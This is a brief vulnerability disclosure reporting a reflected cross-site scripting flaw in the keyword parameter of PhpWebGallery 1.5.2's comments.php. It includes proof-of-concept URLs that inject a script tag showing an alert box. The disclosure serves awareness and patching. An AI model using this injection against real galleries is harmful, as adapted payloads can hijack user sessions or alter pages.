Produce : PhpWebGallery <= 1.5.2 Site : http://www.phpwebgallery.net Problem : XSS Greetz : hasnaa and all friends Moroccan Security Research Team Vulnerable file : comments.php Exploit : http://localhost/phpwebgallery/comments.php?keyword=%22%3E[XSS] http://localhost/phpwebgallery/comments.php?keyword=%22%3E%3Cscript%3Ealert('Hi+Master');%3C/script%3E Contact : iss4m.h@gmail.com